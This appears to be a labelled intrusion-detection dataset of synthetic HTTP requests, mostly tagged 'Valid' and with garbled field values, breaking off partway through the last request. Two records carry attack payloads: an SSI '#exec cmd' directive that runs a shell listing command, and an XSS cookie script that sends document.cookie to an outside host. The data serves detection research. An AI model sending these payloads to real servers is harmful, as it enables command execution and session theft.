GET /npCQS_33w0pKZDQzZ/t3xFeiPK@.HL8Pfg/rHRwntFiovdtlso1naea/WpAh/ilpn9sznhutGurazr3ue.htm?Eyee8dsyNi=2&7gC=uwUde&tsnd1oeslt=jfstylei2tH%3Df1thp&18=56021821&imgeKXmP.=49683538&s6fdvhnw=gg&unjdcsqnLmeue0t=sf%2BhexshnyLug&tdeadncet=r7a6hm&oboot.iniz4YooEH=2&M2f=0&baeinlM=ipzFD&Ue2d1ash8=Etga&mzc3o=e3ji5gCV HTTP/1.1
Host: www.tddadnnEi.de
Connection: keep-alive
Accept: image/gif, application/x-tar;q=0.8, text/plain;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 33.14.23.53
Cookie: wgetb0a8vwp-kR.=nTr5t;ntPer=:apyvpositionnitdX;ld0s=4845133
Cookie2: $Version="203"
Date: Thu, 28 Jun 07 20:19:13 UTC
ETag: "k2kvhZuKL_8lKOHWh"
Expect: 100-continue
From: Iaitkel@rOtuy.it
If-Modified-Since: Tue, 23 Mar 04 17:56:28 GMT
If-Unmodified-Since: Wed, 27 Jul 05 18:14:30 CET
If-Match: "5.R8Bxowqm5JsfliupK"
If-None-Match: "xhWGnPyAVmcQPa3"
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 0
MIME-Version: 8.8
Pragma: htxeo='esu'
Proxy-Authorization: NTLM bm1pbmVuZUM4cmhhc2VydWF0aWV2cm1vbmNnaW1hc2VzdHZ3Z2xE
Authorization: Digest opaque="tertnse7"
Range: -84,186-,1747-
Referer: /enectefo/ihbms.htm
TE: deflate,deflate;q=0.7,trailers
Trailer: From
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 5.3; Ta-ht; rv:9.3.4) Gecko/39225285
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 370x5547
Via: 5.5 200.6.209.233:383, 6.5 247.149.3.157
Transfer-Encoding: gzip
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 171.157.110.56
X-Serial-Number: 26514
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27816
Start - Id: 21936
class: Valid
GET /adbntcdnrse.cgi?QMnull7bj5vCB=ltwsr_0zQdN&processing-instructionOhypfopt-KlMm=+libvsidt-t%3Dincc7amz&ec8rdtfuhmmw=anetcaternph-whereinsertand%5C+xaotconnect8&hzsdTTaoM.2=tv%24&taNeDapmd=761&5i6=4685736&nentAnie=mn7ve HTTP/1.0
Host: 173.241.22.162
Connection: close
Accept: video/*;q=0.5, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=16
Client-ip: 16.219.91.127
Cookie: utnqetaoo=155807;Dp3mZLkkGJE= jn7gncer;ddt=xanr;70YSHPFzsock_streamq=t1oh;bpgo1trtwcsw=sohay8fhodaia
Cookie2: $Version="7"
Date: Sat, 12 May 07 14:47:17 UTC
ETag: W/"iY-@jOFWSIQWIWo0YtmT"
Expect: stooeyr=sire;4eafodr
From: slrRd@iranIqirm.be
If-Modified-Since: Sun, 06 Jul 08 20:09:26 UTC
If-Unmodified-Since: Tue, 07 Sep 04 17:30:19 CET
If-Match: "rw8hPNjVM6Wrt5X"
If-None-Match: *
If-Range: "vOXgYMQvaRrArUt."
Max-Forwards: 4
MIME-Version: 5.9
Pragma: rkeahhTo='e'
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Ul7a ndPry=ctbIrNpe
Range: 5944-,-4,93231-
Referer: http://www.heeyets.de/elhoe/m4a2o7a/bery/euriednr/1xvhc7f.asp
TE: chunked,chunked;q=0.1,trailers
Trailer: Referer
User-Agent: Mozilla/8.2 (X11; U; Linux i386 5.6; ne-cn; rv:5.6.4) Gecko/25099310
UA-CPU: x86
UA-Disp: 069,983,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 350x171
Via: 0.8 www.faueaBsr.shtml, HTTP/1.5 191.16.92.136:7, HTTP/2.1 250.154.216.215:4781
Transfer-Encoding: gzip
Upgrade: eoa1/3.0, hiir/9.7, 4tf/2.3, u1ad/4.7
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 210.111.100.63
X-Serial-Number: 09176432061314
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21936
Start - Id: 34553
class: Valid
POST /@D/rswsaseo8tkrFnS/ohaTaen/dnZD-1/M_pvar_I_50rSP8KU/36stdoeeEgE/tQ/p@htaccesX1dD.@tmpclnode4/sa1zKQxrZ8/jjauArIz.tiff? HTTP/1.0
Content-Length: 103
Content-Language: moeotes
Content-Encoding: deflate
Content-Location: /Pmx50/iieciD/lAcrrg.swf
Content-MD5: YWVvcmN6Y3NmaTlvcndlNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 05:27:10 UTC
Last-Modified: Sun, 06 May 07 18:53:04 UTC
Host: www.eean.be:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ffote-Ajghred;q=0.8, n-7cTy6i, aeo7-n;q=0.6, eepoei-itsnodts
Cache-Control: no-transform
Client-ip: 142.252.150.238
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="819"
Date: Thu, 28 Jun 07 21:09:33 UTC
ETag: "gY1vMtzXVC4AuJDCwZH"
Expect: yiqyob
From: r4o9@ecoOy.ch
If-Modified-Since: Wed, 20 Feb 08 05:51:52 GMT
If-Unmodified-Since: Wed, 30 Apr 08 01:01:52 GMT
If-Match: *
If-None-Match: "VzPrdL0r3vyJq45iGdz"
If-Range: Thu, 17 Jun 04 05:33:31 CET
Max-Forwards: 669
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Digest cnonce="daLd"
Range: 700959-,22-,44069-
Referer: http://orhj.fr/eEieotre/jis0toh/aphdobe.html
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/9.3 (X11; U; Linux i386 2.4; 1r-en; rv:7.2.2) Gecko/07690226
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 066x785
Via: FTP/7.4 42.104.118.172:888, 4.7 www.yI8sire.gif, 9.1 158.117.234.127:99765
Transfer-Encoding: compress
Upgrade: nsrg/4.0, ieR/8.7, bte/5.1, eocer/6.3, rohet/6.9
Warning: 572 93.181.174.70:9 "Nv99hl5yheexr" "Tue, 08 Jan 08 21:03:46 UTC"
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 899542790
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

hmnn3n=548&dnecsiL=NstpeetOna&KMrdmAWn_AM6=436&csUjxdos=)Ewn&@Fbody_=ee]wd&smrodecsteelwt=ehnhStri3

End - Id: 34553
Start - Id: 15220
class: Valid
GET /ah/rpPZ0M-.php? HTTP/1.0
Host: 103.213.193.131
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.8, identity, identity;q=0.4, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 67.21.180.231
Cookie: e2twoNelctpesin=ot5Sew;rauibt=H r aEgm:673r;k30ceol11=tmayeyeae'erdRsaoD
Cookie2: $Version="236"
Date: Sun, 18 Jan 09 12:29:11 GMT
ETag: W/"@da@leod86.CYSlI"
Expect: 100-continue
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Sun, 03 Dec 06 21:45:59 CET
If-Unmodified-Since: Mon, 25 Jun 07 13:34:47 CET
If-Match: "sCGhQb-BUNy40TLAl"
If-None-Match: "d5txQXL5mkslID1P"
If-Range: *
Max-Forwards: 7142
MIME-Version: 9.5
Pragma: aoeiIi3i='5lcz'
Proxy-Authorization: NTLM aHRrdU5ldGh0VWF3ZWl0SGdjcnlmckRhZTdnZnRFMzFrb2R5YWxlT3JnZQ==
Authorization: Basic RDhoZTdlbXo6dHR0ZQ==
Range: 8-,6457-,15780-
Referer: /5h2rLsi/iraots/eiiliH/Nstdadi/dYte.cgi
TE: deflate,gzip;q=0.6,trailers
Trailer: User-Agent
User-Agent: enieiNlpf/6.8.6
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1443x630
Via: gcedt/6.8 www.rrsO.png:5862, FTP/1.3 www.neL7.html
Transfer-Encoding: ivqkdw
Upgrade: sua0/7.7, pt9do4/4.0
Warning: 640 220.2.93.116 "sesbape4s" "Sat, 04 Dec 04 16:33:54 UTC"
X-Forwarded-For: 246.111.80.235
X-Serial-Number: 985452
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15220
Start - Id: 33263
class: Valid
PUT /vWe5ehJ9hWtr22X/pMp_v/ik/lW/alAVK/clikezg8qlibXeLGxmlVII/yrl/1arad95uikl3eidtdb/c2J_1X7R9TreplaceKsM/oo1ojanboui.php? HTTP/1.0
Content-Length: 275
Content-Language: nosh,J
Content-Encoding: gzip
Content-Location: /mawitm/u3syUIeo/geeiFhd.zip
Content-MD5: b2VpOFRYcmVUcGVzcDRlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 04 24:52:43 CET
Last-Modified: Mon, 03 May 10 23:21:08 CET
Host: 234.201.68.112
Connection: close
Accept: */*;q=0.6
Accept-Charset: cp-950;q=0.7, koi8-r;q=0.4, isiri-3342, windows-1255;q=0.4
Accept-Encoding: identity;q=0.2, identity, compress, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 17.231.141.238
Cookie: IodEhoeph2cig=0982;V5AjJ=where unnXifnfu:rwn\@aphpe;lek1neamdrAyh=40113716;hhwynrbe=smAK73mjBSj;dropvhtaccesDhp.=5;Fgfhl3nHp=txWe
Cookie2: $Version="35"
Date: Tue, 30 Mar 04 12:17:19 UTC
ETag: W/"vj8wTgBR@25qmjKFMti"
Expect: hou2r
From: fhleens@leny2Irsni.it
If-Modified-Since: Thu, 28 Jul 05 17:42:31 GMT
If-Unmodified-Since: Thu, 09 Oct 08 14:48:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM c1BoWW1uMmxyZWx0Y2lvYXJvZWhJeHBqMGNpZ2U2ZmFvc2VMYndo
Authorization: Basic eVQwaWU6b2l0Mmhp
Range: 659776-,87434-,7-715
Referer: /8bPyq/rlstu/td4t.asp
TE: trailers
Trailer: Pragma
User-Agent: d3LejdtauoezMtaxyn
UA-CPU: x86
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8624x050
Via: arS/3.8 47.245.83.192
Transfer-Encoding: gzip
Upgrade: 2o8/7.5, tlkaU/8.1, cSo5ei/1.7, nnttqr/9.4
Warning: 551 21.162.127.115 "nsjirfogneooziabr" "Thu, 08 Jan 04 20:08:26 UTC"
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 09187614917730
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

efnhtn=oat0iejh&la=di5<nsnodq&4zrmexum9w8ooS3=35732731&lcRfd=18645026&lni=uomrS7t<msEdeEg&9landlib=ikeleowr&at9na2aa=dOs4tPan1tM&leIsAoe3ea=614420165&ir2eneags=ev&ZDq6sobjectei11q=0122756&hmAn=adfzoerytlb?aidfsiframeue&gfee1r=2064949229&3tqVmlleof=10&lunameorm7g=rlmTou

End - Id: 33263
Start - Id: 28379
class: Valid
GET /aPT.aspx?yxt=stdinirysu&Ohjt7y=9hdekeMpujnurnni0h&aenhiapermtsutj=maild%3B8e&dnaizdnsegb=Ctenia&In874mrnnrnif=tnkhe&he=eYoNl.21Ok&lJlaT7JxYa=984879&qeno=jPdMzUc4_&aeaie70dsiHtqoo=aidIroeUrdc&z8n6=ThR4&Tm=8543 HTTP/1.0
Host: 159.152.60.84
Connection: Smtaumeo
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 230.148.204.47
Cookie: 4lo=tipsnaeevase;nshcEe=E zn;tujb=iteimdliHotb];qnNnf8or=oc;uno5qii=deletetsco wgetH4aabel 
Cookie2: $Version="225"
Date: Sun, 10 Feb 08 02:52:43 UTC
ETag: W/"7D0i5k_pkoT1ORbjjIa"
Expect: 100-continue
From: tduar@4rlra.gov
If-Modified-Since: Mon, 27 Sep 04 16:52:32 UTC
If-Unmodified-Since: Sun, 22 Jul 07 06:19:59 GMT
If-Match: "@_.Keru6ozQsCKT6p"
If-None-Match: "c1iFPfg@jXQbNMGt6w"
If-Range: *
Max-Forwards: 2866
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: NTLM ZXZxaXcyZmJvZXRtdG5MY3RUNWVvc2VpeG9lOE5lZWRzaTFubk9uaWE=
Range: 665026-
Referer: /tCdeco1/eD6ctv.sh
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: tbsteetr (re8w@c4; eoic-O; nTLt2P-)
UA-CPU: Sparc
UA-Disp: 780,2913,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 965x809
Via: FTP/5.4 57.20.31.40:92
Transfer-Encoding: compress
Upgrade: s6J1rt/6.3, CowrfR/7.8
Warning: 400 www.5ytrzae7.gif "nwouaqlicrdcwyfeiOy" 
X-Forwarded-For: 162.179.185.64
X-Serial-Number: 7465297368
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28379
Start - Id: 25034
class: Valid
GET /jlt/wdUbi@gh1El@iHb/y@j5/e5scoD@g4tZPMz/Dmc@/itXit/UdCgYQlQdNXGWHt/mRMJQpXay6t4EfrwtYaM.tiff? HTTP/1.1
Host: www.doNurewb0d.it
Connection: 3Shazow
Accept: */*;q=0.5
Accept-Charset: x-mac-icelandic, iso-8859-6, windows-1252, utf-7
Accept-Encoding: *;q=0.3
Accept-Language: ncldlr-0aqe;q=0.4, eaesdcou-vRoepe
Cache-Control: no-cache
Client-ip: 15.48.155.195
Cookie: lCsraoo12asc=2
Cookie2: $Version="57"
Date: Wed, 11 Feb 09 13:00:38 UTC
ETag: W/"nfsHJ.M1pxNiBH8r"
Expect: esoi
From: ldep5e@hgrLTT7s.gov
If-Modified-Since: Fri, 23 Mar 07 14:13:27 UTC
If-Unmodified-Since: Tue, 12 Feb 08 01:39:56 CET
If-Match: "AgZhyzXuiGnhCKPx"
If-None-Match: *
If-Range: "O2NGPMiPpPIDp-lYn"
Max-Forwards: 6
MIME-Version: 8.5
Pragma: td1='oe1k'
Proxy-Authorization: Basic bmFhbXIxZTpwdGVpcm5u
Authorization: NTLM c3RlcGVmZ25jdHBIcmVyZ1Zjc2FyTW5tNWNzbkh0aHN0ZXdhZGkzcXd1cmV0bzRo
Range: 81636-,-8
Referer: http://tns9e.gov/vcr5i4/Hhnx/k8miinid/iaaNXnQe.php3
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 8.5; et-SL; rv:5.1.2) Gecko/23185894
UA-CPU: x86
UA-Disp: 002,8745,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 669x906
Via: 7.7 www.otCug7je.js:24142, 0at/3.2 44.149.89.210
Transfer-Encoding: identity
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 976 50.238.126.25 "5Nrzea1Ynnb" "Thu, 31 Dec 09 03:17:04 GMT"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 25034
Start - Id: 39933
class: SSI
POST /0jhla/ea7ogmK0pp/cSgroup byNUnodeumVa4is/enaeFtrrfAnd/enYrNNtnp.css? HTTP/1.0
Content-Length: 358
Content-Language: I3diylu,3lt,4taa
Content-Encoding: compress
Content-Location: /ileuhn/oseionmS/0Meas/eeczo/aii5.tar
Content-MD5: YWN4b3N1dG95c3JpYW5ndg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Oct 08 12:21:57 UTC
Last-Modified: Fri, 30 Jun 06 07:25:29 CET
Host: www.iemqesol3.com
Connection: ahsoheii
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: t-I8NofAyr, qs5t3W-h
Cache-Control: e=otnEm
Client-ip: 241.54.246.2
Cookie: yb8detinTt=u$dppainbbetweennm$awsw>l;trcm0na7=nqIatao;ss7peto=94775;.F2QGND@rechoC7=818907768;et4lbott5=eIwfImJAs8ed;ybawtObacqnoFu=aYSd7I3z2S
Cookie2: $Version="17"
Date: Sat, 28 Nov 09 11:46:28 UTC
ETag: "904lqZNeUrGwrPUmWLi1"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Wed, 16 Jun 04 07:25:43 GMT
If-Unmodified-Since: Wed, 17 Dec 08 01:18:58 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Feb 08 02:53:56 UTC
Max-Forwards: 733
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: Digest username="isnm"
Authorization: Basic ZHN0c3I6c2hlanNlUw==
Range: 065804-4,-22740,4181-
Referer: /1j0wtf/nxerqh/0jit6ngE/ouli.ace
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 8.2; kg-js; rv:2.1.2) Gecko/46453253
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: iisi/1.9 45.161.44.95, 2.9 www.aaTfibac.gif, 6.5 227.213.13.202
Transfer-Encoding: gzip
Upgrade: awoh/8.2
Warning: 800 145.154.254.159 "waio" "Sat, 03 Feb 07 02:53:35 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wp-Gvrcp2IuPBDi5=980933&rvc5siu=640&3td7yUot=Sexeci&d&9onNen1ciDah=<!--  #exec  cmd="/bin/ls -l    /home/etIW/i21tfdIs"   -->&usgirewisi=ssM&ah=s)9&3emyubsidglil=t4smen&tedro6ttif=94075188&lkeqle9=lZWa4Cji&Iebuufacigyrj=1340022066&8arZaeyvre1nsWs=he-3&gssaosu=89kd4a9s3aldgyei&fevoohanow=lEW&FSDZUhttpP7FTew=5210&cviei=ep6AlgvrBMK

End - Id: 39933
Start - Id: 25525
class: Valid
GET /iot3y/iipy5ZO/Ahe/e7@GxBT8Cmyk1gF8bxED/l7wbernbe/i477PRWICzp.swf?Nscript3IQaccess_log.body=1Iaobaiframeituz2w HTTP/1.1
Host: www.jrfw.com
Connection: keep-alive
Accept: application/*, image/png;q=0.7
Accept-Charset: windows-1251;q=0.1, x-mac-ce;q=0.5
Accept-Encoding: gzip, gzip, identity, gzip
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 48.113.165.204
Cookie: u8fatea=u%;3tiefiumpi5=55823967;te8=0531
Cookie2: $Version="39"
Date: Mon, 29 Dec 08 18:25:31 UTC
ETag: W/"9gnxzhim.JJgvyVvjd"
Expect: 100-continue
From: osil@wYub.gov
If-Modified-Since: Sun, 26 Oct 08 11:18:16 GMT
If-Unmodified-Since: Wed, 12 Aug 09 23:36:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1109
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: NTLM aWF5c2VuZWkxdXVxODc4bWx3bGFsRWFzcmVvODNvNWNjaXI4d3RlaXNmNzFuZw==
Range: 667-742
Referer: /osc2sof/Nteejp.ace
TE: gzip
Trailer: Date
User-Agent: uqnnee
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5796x493
Via: HTTP/5.6 118.114.225.149:693
Transfer-Encoding: compress
Upgrade: utH/5.0, httwz/8.8, luydy/3.7, rLo/1.4, iool1/1.7
Warning: 111 118.94.67.31 "uxakonOyb" "Mon, 04 Oct 04 19:54:01 UTC"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 9918504
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25525
Start - Id: 46674
class: XSS
GET /-svJHjform0Km-/mILwBOxaCz9Fcl5Ql40/eGcHzje/Dro0p4re2BSut/Xohtaccesr/1lzuZQVgWwy.htm? HTTP/1.1
Host: 16.140.75.22
Connection: Cohg9e
Accept: video/*, text/html
Accept-Charset: gb2312;q=0.1, koi8-r, big5;q=0.8, koi8
Accept-Encoding: gzip;q=0.4, deflate;q=0.6, gzip, identity
Accept-Language: ghid-iiNdt, h9lium-nrooerie;q=0.2, emttew-tbdjrtfe, datbntee-a9, p-a;q=0.3
Cache-Control: irmrrs='gs4ge'
Client-ip: 125.79.134.83
Cookie: HJCO_7V=[\xC0][\xBC]script >[document.location.replace  ('http://www.maat.com/cgi-bin/relenitr.cgi'+document.cookie);][\xC0][\xBC]/script >;dIi=nqo12irpWonn7jpS8z;cix=s&-tgmr&blinko<oc
Cookie2: $Version="2"
Date: Fri, 25 Jan 08 05:50:42 GMT
ETag: W/"tFAOV_hpgZ8i-tSn05"
Expect: 100-continue
From: Dped3ih@fknm2tsceo.gov
If-Modified-Since: Thu, 15 Jul 04 16:45:00 UTC
If-Unmodified-Since: Thu, 08 May 08 03:20:20 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Sep 07 14:16:00 CET
Max-Forwards: 8351
MIME-Version: 0.9
Pragma: wahfo8='nihekar'
Proxy-Authorization: NTLM MjRpd2VxemRvbzlldHNobmV0aGlzem1yY2t0ZWlsczdySDlmY3E0YW1vbg==
Authorization: RflEan 9dRik=nrsfaak
Range: 012087-,-8
Referer: /xcao/raaabn/umti/fil0/sagSaa.js
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.6 (Windows; U; Win98 4.1; ot-e0; rv:2.8.4) Gecko/56802984
UA-CPU: x86
UA-Disp: 598,1386,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 630x4242
Via: HTTP/4.3 www.enoei.shtml
Transfer-Encoding: identity
Upgrade: ms8pnA/8.6, 2r5c/1.7, a6d/6.2, Hgagks/0.3, dwe/0.6
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 249.226.25.170
X-Serial-Number: 19077842196498
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46674
Start - Id: 17394
class: Valid
GET /aieetn/htrQO/y9HE7EAJ/-L12/paddb0zo/Xupdate.htm? HTTP/1.1
Host: 35.170.42.232:64888
Connection: o7aGle0
Accept: */*
Accept-Charset: x-mac-korean;q=0.9, iso-8859-3, cp-950, euc-jp;q=0.3, windows-1250;q=0.6
Accept-Encoding: compress;q=0.6, gzip, deflate;q=0.9, gzip
Accept-Language: ioam-rl;q=0.2, siasi-OdnAenlr;q=0.7, roaaa-o, i3eaYcet-sc;q=0.0
Cache-Control: no-store
Client-ip: 101.106.159.200
Cookie: 90siu4zot=ahtoossuneeulujeg
Cookie2: $Version="1"
Date: Sun, 10 May 09 10:13:40 GMT
ETag: "D2QB6MZqXmCm-axSnt"
Expect: 100-continue
From: hErN7au@nLt0ryhez.uk
If-Modified-Since: Mon, 06 Nov 06 02:37:38 CET
If-Unmodified-Since: Sat, 15 Aug 09 02:43:35 GMT
If-Match: *
If-None-Match: "5tyc.QE1qRwf7ZU2"
If-Range: Wed, 16 Jan 08 07:04:01 CET
Max-Forwards: 820
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWFubGU1aGUwOXJucmFyYXNwSGNvaGEwc2JhQmlvb05wSWVycWJlQWQ=
Authorization: NTLM c2hud2x0cDhtb2RwaWUzb1Jld2ZHZTFyaGVwTWVlc2VP
Range: -29
Referer: http://www.namhw.org/spta2do.msf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 0.5; ha-he; rv:5.9.1) Gecko/94590769
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3112x2775
Via: FTP/4.0 www.8luar4gt.htm, 1.9 12.45.111.105
Transfer-Encoding: identity
Upgrade: skn/5.4, 8st/5.3, tia8to/8.7, wnio/7.7, w2t79p/4.2
Warning: 500 www.ietLLq.png "WitpeagmraOeteXfnE" "Fri, 22 Feb 08 21:37:25 CET"
X-Forwarded-For: 208.220.17.9
X-Serial-Number: 534036492924791
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17394
Start - Id: 8288
class: Valid
GET /n89_C/hvmRlOym96SkyI/kpH6XiFB/wwEfhEeqzogni/zoDw3YWcWVXgy/etadrrpeeaq1anon48ur/apWaAh/nWVRjJ_8Vfuq/ft.gif? HTTP/1.1
Host: 203.223.114.112:80
Connection: tsHngt3
Accept: image/*
Accept-Charset: windows-1251;q=0.8, iso-10646-ucs-2, windows-1251
Accept-Encoding: *;q=0.4
Accept-Language: erga8-Snwyc, 2l-abnee;q=0.9, seS-reo0fok;q=0.6
Cache-Control: max-age=84870
Client-ip: 103.150.59.243
Cookie: RyoJuGh4=ts6y?ko0se5o7e;p6esaretolq=si01mGzfInoi
Cookie2: $Version="440"
Date: Thu, 04 May 06 09:31:54 CET
ETag: W/"LPTK.z6q0rpOnql8I"
Expect: 100-continue
From: hiDbh@eMCsorant.biz
If-Modified-Since: Mon, 15 May 06 04:05:03 UTC
If-Unmodified-Since: Mon, 17 Dec 07 13:11:56 UTC
If-Match: "wmBwdk2w8dHgoNYuL"
If-None-Match: *
If-Range: Fri, 25 Feb 05 13:11:24 GMT
Max-Forwards: 0195
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWVnb2ZoYXNMcHNlT2VwZm5hY2VFZHRoYTNVcmVnaHNTZWFsam90YWxkUmNy
Authorization: Digest nonce
Range: 9-,-1,846-
Referer: http://www.edStsa.cz/h5mhSH.aspx
TE: trailers
Trailer: Range
User-Agent: tNljnoa http://www.tdcfci.be
UA-CPU: Sparc
UA-Disp: 9881,382,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 833x678
Via: 1.3 www.F7rhnmEe.jpg, 2.7 228.44.186.150, FTP/9.6 www.etretcg.js
Transfer-Encoding: gzip
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 538 www.sott5Af.png "9aadlAe" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 538548
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8288
Start - Id: 5401
class: Valid
POST /rvepNwgwininofl/5Nwindow.openCdpsNFXN/tdewn5dnne0DhefeheIH/aC5hl/6AuqWV9w7/tzq-W9z@1FecIpYaB0l.asp? HTTP/1.1
Content-Length: 53
Content-Language: puOeeu
Content-Encoding: compress
Content-Location: http://Jf5t0RHt.gov/0Tsmozn/f7h6H/shm6uUc/Ei6nalt.fgf
Content-MD5: eW90c3RlZWRjdGhTSWVzOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Nov 05 09:22:35 CET
Last-Modified: Thu, 09 Aug 07 18:44:45 GMT
Host: 124.136.182.168
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-6, cp-932;q=0.6, gb2312;q=0.3, iso-8859-2
Accept-Encoding: 
Accept-Language: TSiRa2-r, e-eoayEeRa, oim-re3Emdn;q=0.3, eeo-jltugjkl, dhQ-j;q=0.7
Cache-Control: max-age=901
Client-ip: 49.138.242.29
Cookie: rsezhats=ol;hrcnhcni6i=bThwj4mo6s/;hteenoaatgi=vloi'a e&tinsert7deoh\e\;ahasdise7a=15382;pLahnbhyes=l5m6Ac
Cookie2: $Version="9"
Date: Sun, 06 Aug 06 01:26:18 UTC
ETag: W/"vt.0GkL2HP63RDUQ0If"
Expect: uools=kenw;bnaue4
From: heif@92m3ed.fr
If-Modified-Since: Tue, 02 Jan 07 10:17:25 CET
If-Unmodified-Since: Fri, 31 Dec 04 10:43:36 CET
If-Match: "NQBokgsdNGLa51rKg4"
If-None-Match: "TGoGU@8K3qv@oeJ"
If-Range: *
Max-Forwards: 614
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: sgjr Elepaa=Eepe
Authorization: Digest opaque="eauri"
Range: 18375-6599,-64,09092-
Referer: http://wfuas.be/Wsmehaod/awfysS6f/uceiNy9e.shtml
TE: gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/8.6 (compatible; Konqueror/0.4; WinNT; ph6brEm; gtnp; dho1lettiO)
UA-CPU: x86
UA-Disp: 958,782,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 237x186
